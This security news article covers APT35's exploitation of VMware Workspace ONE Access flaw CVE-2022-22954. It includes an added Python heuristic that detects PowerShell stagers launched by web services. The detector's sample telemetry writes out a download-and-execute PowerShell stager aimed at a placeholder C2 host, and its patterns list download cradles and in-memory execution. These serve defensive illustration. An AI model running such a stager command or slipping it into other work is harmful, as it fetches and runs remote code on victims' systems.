A significant remote code execution (RCE) vulnerability, CVE-2022-22954, in VMware Workspace ONE Access (formerly VMware Identity Manager) is being actively exploited by advanced threat actors. The vulnerability was fixed in a security update released 20 days ago, together with two more RCEs, CVE-2022-22957 and CVE-2022-22958, which affect VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
Soon after the issues were made public, proof-of-concept (PoC) exploit code appeared in the wild, allowing attackers to target vulnerable VMware deployments. VMware confirmed that CVE-2022-22954 had been exploited in the wild. Morphisec researchers have observed exploitation by advanced persistent threat (APT) actors, namely an Iranian group known as APT35, aka “Rocket Kitten.”
The attackers gain initial access to the environment by exploiting CVE-2022-22954, the only RCE of the three that does not require administrator access to the target server and that has a publicly available proof-of-concept exploit. The attack begins with a PowerShell command that launches a stager on the vulnerable service (Identity Manager).
The stager then retrieves a heavily obfuscated PowerTrash loader from the command and control (C2) server and loads a Core Impact agent into system memory. In this case, Core Impact is a legitimate penetration testing tool misused for malicious purposes, much as Cobalt Strike is abused in malicious operations.
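The chain described above has a recognisable shape in process-creation telemetry: a PowerShell process spawned by the web application that hosts the vulnerable service, carrying a download cradle and an in-memory execution primitive. The following is an added detection example, not code from the article or from Morphisec's report. The parent process names, the scoring weights and the sample events (including the placeholder C2 host) are assumptions constructed for illustration.

```python
"""Heuristic detection of a PowerShell stager launched from a web service.

Added example: scores process-creation events for the pattern described in
the article (PowerShell started by the vulnerable web service, pulling a
loader from C2 and executing it in memory). All names below that are not in
the article are assumptions.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Assumption: process images a web identity service is likely to run under.
WEB_SERVICE_PARENTS = {"java", "tomcat", "httpd", "nginx", "w3wp.exe", "node"}

POWERSHELL_NAMES = {"powershell", "powershell.exe", "pwsh", "pwsh.exe"}

# Command-line traits of a download-and-execute stager; each adds its weight.
INDICATORS = [
    ("download_cradle", 3, re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient|Start-BitsTransfer", re.I)),
    ("in_memory_exec", 3, re.compile(
        r"\b(?:IEX|Invoke-Expression)\b|\[Reflection\.Assembly\]::Load", re.I)),
    ("hidden_window", 1, re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", 1, re.compile(r"-no?p(?:rofile)?\b", re.I)),
    ("bypass_policy", 2, re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
]
ALERT_THRESHOLD = 5  # assumption: tune against your own baseline

_ENC_FLAG = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class Finding:
    host: str
    score: int
    reasons: List[str] = field(default_factory=list)
    decoded_command: Optional[str] = None


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE in base64), if any."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: ProcessEvent) -> Finding:
    """Score one process-creation event; non-PowerShell images score zero."""
    finding = Finding(host=ev.host, score=0)
    if ev.image.lower() not in POWERSHELL_NAMES:
        return finding
    text = ev.command_line
    decoded = decode_encoded_command(text)
    if decoded is not None:
        finding.decoded_command = decoded
        finding.reasons.append("encoded_command")
        finding.score += 2
        text = f"{text}\n{decoded}"  # scan the wrapper and the decoded payload
    if ev.parent_image.lower() in WEB_SERVICE_PARENTS:
        finding.reasons.append(f"spawned_by_web_service:{ev.parent_image}")
        finding.score += 4
    for name, weight, pattern in INDICATORS:
        if pattern.search(text):
            finding.reasons.append(name)
            finding.score += weight
    return finding


def detect(events: List[ProcessEvent]) -> List[Finding]:
    """Return findings at or above the alert threshold."""
    return [f for f in (score_event(e) for e in events) if f.score >= ALERT_THRESHOLD]


# Constructed sample telemetry (not real IoCs); the C2 host is a placeholder.
STAGER_CMD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/loader.ps1')"
STAGER_B64 = base64.b64encode(STAGER_CMD.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent("idm-appliance", "java", "powershell",
                 f"powershell -nop -w hidden -enc {STAGER_B64}"),
    ProcessEvent("admin-ws01", "explorer.exe", "powershell.exe",
                 "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"),
    ProcessEvent("build-01", "java", "powershell.exe",
                 "powershell.exe -Command Get-ChildItem C:\\build"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f.host, f.score, f.reasons)
        print("  decoded:", f.decoded_command)
```

Only the first constructed event alerts: a web-service parent on its own scores 4 (the third event), which keeps build or automation hosts that legitimately run PowerShell from a Java process below the threshold, while the combination of web-service parent, encoded command, download cradle and in-memory execution scores far above it.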
This is not a new tactic. Trend Micro has previously attributed abuse of Core Impact to APT35, with activity dating back to 2015.
“Morphisec research observed attackers already exploiting this vulnerability (CVE-2022-22954) to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons” - Morphisec.
According to Morphisec CTO Michael Gorelik, the attacker attempted lateral movement on the network even after the backdoor was shut down. Morphisec’s analysis further notes that attacks of this kind, when run with privileged access, can bypass traditional defenses such as antivirus (AV) and endpoint detection and response (EDR).
Morphisec recovered the stager server’s C2 address, the Core Impact client version, and the 256-bit encryption key used for C2 communication, ultimately tying the operation to a specific individual named Ivan Neculiti. Under that name, the ‘Hucksters’ fraud exposure database lists businesses registered in Moldova, Russia, and the United Kingdom, including a hosting firm that, according to the database, supports all kinds of unlawful websites, spam, and phishing activity.
It is unclear whether Neculiti or the affiliated firms took part in cybercrime operations, knowingly or unknowingly. Both hosting companies have yet to respond to requests for comment on the allegations made in Morphisec’s report.